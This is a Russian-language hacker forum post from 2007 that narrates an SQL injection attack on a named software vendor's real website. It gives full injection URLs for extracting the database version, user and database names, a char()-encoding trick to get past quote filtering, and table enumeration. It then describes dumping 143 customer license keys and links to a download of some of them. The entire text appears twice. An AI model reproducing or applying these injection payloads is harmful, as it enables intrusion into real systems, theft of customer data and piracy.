[53x]Shadow
11.09.2007, 20:47
Т.к. инфа не вызвала интерес в опр. кругах, решил выложить в паблик может кому пригодится...
Просматривая как-то раздел "Сборник полезных прог(маст хев)" наткнулся на одну прогу:
Название проги:
PerfectDisk
Тип проги:
дефрагментатор
Лицензия:
Shareware
Подробное описание:
Мощный дефрагментатор жесткого диска, разработанный при поддержке Microsoft. Мне например отдефрагментировал диск который немогла отдефрагментирвать не одна программа до этого
Линк для закачки:
http://www.raxco.com/products/perfectdisk2k/
И так оф.сайт компании www.raxco.com
Веб-сервер IIS, ну думаю наверно MSSQL и не ошибся.
Порывшись немного нашел скуль:
http://www.raxco.com/new/testimonial_details.cfm?TestimonialID=183+and+1
Далее стандартно версия, пользователь, имя БД:
http://www.raxco.com/new/testimonial_details.cfm?TestimonialID=1+or+1=@@ver sion--
http://www.raxco.com/new/testimonial_details.cfm?TestimonialID=1+or+1=(sele ct+system_user)--
http://www.raxco.com/new/testimonial_details.cfm?TestimonialID=1+or+1=(sele ct+db_name())--
Version:Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.0 (Build 2195: Service Pack 4)
User:webman - оказался полный лох =\ никаких прав на master(процедуры) и права на добавление, изменение, удаление даже в своей БД.
DB:Testimonials
Далее узнаем имена таблиц:
http://www.raxco.com/new/testimonial_details.cfm?TestimonialID=1+or+1=(SELE CT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES
Но дальнейший вывод таблиц не катил - причина фильтрация кавычек!
Обходим:
http://www.raxco.com/new/testimonial_details.cfm?TestimonialID=1+or+1=(SELE CT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES +WHERE+TABLE_NAME+NOT+IN(char(84)%2Bchar(95)%2bcha r(84)%2bchar(101)%2bchar(115)%2bchar(116)%2bchar(1 05)%2bchar(109)%2bchar(111)%2bchar(110)%2bchar(105 )%2bchar(97)%2bchar(108)%2bchar(115)))--
Причем ручками преобразовывать каждое имя к последовательности чаров, запарило пришлось писать маленький конвертор на пхп...(ничего сложного)
В результате в данной базе ниодной интересной таблицы =\
Сосвсем расстроился, но через несколько разделов сайта еще скуль:
http://www.raxco.com/products/commerce/purchase_options.cfm?ItemTitleID=1+or+1=(select+db _name())--
причем другая база!!!
DB:RaxcoEcommerce - только одно название чего стоит =)
Вытаскивал таблы минут 15, ппц запарился и все в ручную, приведу лишь малую часть запроса:
http://www.raxco.com/products/commerce/purchase_options.cfm?ItemTitleID=1+or+1=(SELECT+TO P+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+WHER E+TABLE_NAME+NOT+LIKE+char(84)%2Bchar(95)%2Bchar(6 6)%2Bchar(101)%2Bchar(115)%2Bchar(116)%2Bchar(37)+ AND+TABLE_NAME+NOT+IN(char(84)%2Bchar(95)%2Bchar(7 3)%2Bchar(116)%2Bchar(101)%2Bchar(109)%2Bchar(84)% 2Bchar(105)%2Bchar(116)%2Bchar(108)%2Bchar(101),ch ar(84)%2Bchar(95)%2Bchar(80)%2Bchar(68)%2Bchar(82) %2Bchar(88)%2Bchar(76)%2Bchar(105)%2Bchar(99)%2Bch ar(101)%2Bchar(110)%2Bchar(115)%2Bchar(101)%2Bchar (75)%2Bchar(101)%2Bchar(121)%2Bchar(115),char(84)% 2Bchar(95)%2Bchar(66)%2Bchar(101)%2Bchar(115)%2Bch ar(116)%2Bchar(80)%2Bchar(114)%2Bchar(105)%2Bchar( 99)%2Bchar(101)%2Bchar(95)%2Bchar(71)%2Bchar(77),c har(84)%2Bchar(95)%2Bchar(66)%2Bchar(101)%2Bchar(1 15).......
В результате имеем таблицы:
sysconstraints
syssegments
T_BestPrice_DR
T_BestPrice_FR
T_BestPrice_GM
T_BestPrice_UK
T_CountryCodes
T_ExchangeRates
T_Item
T_ItemNFR
T_ItemTitle
T_Order
T_OrderItem
T_PDRXLicenseKeys
T_ProductDownload
T_PromoCodes
T_SAOrder
T_SAReorder
T_TrackingCodes
T_Values
T_WebToOnyx
Интересная естественно T_PDRXLicenseKeys, смотрим колонки:
[T_PDRXLicenseKeys]
CreateDate
CreatedBy
CustomerEmail
CustomerName
LicenseId
LicenseKey
Ну а дальше дампим с помощью скрипта cash(ему кста огромный респ!) колонки CustomerName, LicenseKey
В результате 143 лиценцзии в формате name:key!
Здесь первые пять, думаю всем хватит:
скачать (http://slil.ru/24842410)
Здесь описалово продукта http://www.raxco.com/products/PerfectDiskRxSuite/
Просматривая как-то раздел "Сборник полезных прог(маст хев)" наткнулся на одну прогу:
Название проги:
PerfectDisk
Тип проги:
дефрагментатор
Лицензия:
Shareware
Подробное описание:
Мощный дефрагментатор жесткого диска, разработанный при поддержке Microsoft. Мне например отдефрагментировал диск который немогла отдефрагментирвать не одна программа до этого
Линк для закачки:
http://www.raxco.com/products/perfectdisk2k/
И так оф.сайт компании www.raxco.com
Веб-сервер IIS, ну думаю наверно MSSQL и не ошибся.
Порывшись немного нашел скуль:
http://www.raxco.com/new/testimonial_details.cfm?TestimonialID=183+and+1
Далее стандартно версия, пользователь, имя БД:
http://www.raxco.com/new/testimonial_details.cfm?TestimonialID=1+or+1=@@ver sion--
http://www.raxco.com/new/testimonial_details.cfm?TestimonialID=1+or+1=(sele ct+system_user)--
http://www.raxco.com/new/testimonial_details.cfm?TestimonialID=1+or+1=(sele ct+db_name())--
Version:Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.0 (Build 2195: Service Pack 4)
User:webman - оказался полный лох =\ никаких прав на master(процедуры) и права на добавление, изменение, удаление даже в своей БД.
DB:Testimonials
Далее узнаем имена таблиц:
http://www.raxco.com/new/testimonial_details.cfm?TestimonialID=1+or+1=(SELE CT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES
Но дальнейший вывод таблиц не катил - причина фильтрация кавычек!
Обходим:
http://www.raxco.com/new/testimonial_details.cfm?TestimonialID=1+or+1=(SELE CT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES +WHERE+TABLE_NAME+NOT+IN(char(84)%2Bchar(95)%2bcha r(84)%2bchar(101)%2bchar(115)%2bchar(116)%2bchar(1 05)%2bchar(109)%2bchar(111)%2bchar(110)%2bchar(105 )%2bchar(97)%2bchar(108)%2bchar(115)))--
Причем ручками преобразовывать каждое имя к последовательности чаров, запарило пришлось писать маленький конвертор на пхп...(ничего сложного)
В результате в данной базе ниодной интересной таблицы =\
Сосвсем расстроился, но через несколько разделов сайта еще скуль:
http://www.raxco.com/products/commerce/purchase_options.cfm?ItemTitleID=1+or+1=(select+db _name())--
причем другая база!!!
DB:RaxcoEcommerce - только одно название чего стоит =)
Вытаскивал таблы минут 15, ппц запарился и все в ручную, приведу лишь малую часть запроса:
http://www.raxco.com/products/commerce/purchase_options.cfm?ItemTitleID=1+or+1=(SELECT+TO P+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+WHER E+TABLE_NAME+NOT+LIKE+char(84)%2Bchar(95)%2Bchar(6 6)%2Bchar(101)%2Bchar(115)%2Bchar(116)%2Bchar(37)+ AND+TABLE_NAME+NOT+IN(char(84)%2Bchar(95)%2Bchar(7 3)%2Bchar(116)%2Bchar(101)%2Bchar(109)%2Bchar(84)% 2Bchar(105)%2Bchar(116)%2Bchar(108)%2Bchar(101),ch ar(84)%2Bchar(95)%2Bchar(80)%2Bchar(68)%2Bchar(82) %2Bchar(88)%2Bchar(76)%2Bchar(105)%2Bchar(99)%2Bch ar(101)%2Bchar(110)%2Bchar(115)%2Bchar(101)%2Bchar (75)%2Bchar(101)%2Bchar(121)%2Bchar(115),char(84)% 2Bchar(95)%2Bchar(66)%2Bchar(101)%2Bchar(115)%2Bch ar(116)%2Bchar(80)%2Bchar(114)%2Bchar(105)%2Bchar( 99)%2Bchar(101)%2Bchar(95)%2Bchar(71)%2Bchar(77),c har(84)%2Bchar(95)%2Bchar(66)%2Bchar(101)%2Bchar(1 15).......
В результате имеем таблицы:
sysconstraints
syssegments
T_BestPrice_DR
T_BestPrice_FR
T_BestPrice_GM
T_BestPrice_UK
T_CountryCodes
T_ExchangeRates
T_Item
T_ItemNFR
T_ItemTitle
T_Order
T_OrderItem
T_PDRXLicenseKeys
T_ProductDownload
T_PromoCodes
T_SAOrder
T_SAReorder
T_TrackingCodes
T_Values
T_WebToOnyx
Интересная естественно T_PDRXLicenseKeys, смотрим колонки:
[T_PDRXLicenseKeys]
CreateDate
CreatedBy
CustomerEmail
CustomerName
LicenseId
LicenseKey
Ну а дальше дампим с помощью скрипта cash(ему кста огромный респ!) колонки CustomerName, LicenseKey
В результате 143 лиценцзии в формате name:key!
Здесь первые пять, думаю всем хватит:
скачать (http://slil.ru/24842410)
Здесь описалово продукта http://www.raxco.com/products/PerfectDiskRxSuite/